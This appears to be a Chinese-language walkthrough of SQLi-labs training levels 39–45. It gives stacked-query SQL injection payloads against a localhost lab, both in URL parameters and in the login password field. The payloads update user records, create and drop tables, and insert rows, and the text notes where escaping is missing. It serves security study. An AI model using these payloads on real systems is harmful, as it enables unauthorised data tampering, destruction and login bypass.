less-39
第39與38題的區別爲本題id沒有單引號。
輸入:http://127.0.0.1/sqlilabs/Less-39/?id=1; update users set username=‘more’ where id=‘38’ --+(無單引號爲錯誤)
LESS-40
本處的區別在於id爲‘)閉合方式;
輸入:http://127.0.0.1/sqlilabs/Less-40/?id=1’);create table food like users --+
LESS-41
此處與 less-39 是一致的,區別在於 41 錯誤不回顯。所以我們稱之爲盲注
輸入:http://127.0.0.1/sqlilabs/Less-41/?id=1; drop table food --+
LESS-42
Update 更新數據後,經過 mysql_real_escape_string()處理後的數據,存入到數據庫當中後不會發生變化。在 select 調用的時候才能發揮作用。所以不用考慮在更新密碼處進行注入,這關和二次注入的思路是不一樣的。
本關從 login.php 源代碼中分析可知:Password 變量在 post 過程中,沒有通過 mysql_real_escape_string()函數的處理
的時候密碼選項我們可以進行 attack。
登錄用戶名隨意
密碼登錄用以下的方式:bb’;create table less42 like users
輸入:login_user=admin&login_password=bb’;create table less42 like users#
Less-43
本關遇上一題的區別爲:閉合方式改變
輸入:password=bbb’);update food set price=100 where id=1#
LESS-44
無錯誤提示;
輸入:password=BBB’;insert into food(id,price,username) values (3,30,‘qq’)#LESS-45
和上面相同,不過閉合方式發生改變
輸入:password=bbb’);insert into food(id,price,username) values (2,60,‘book’)#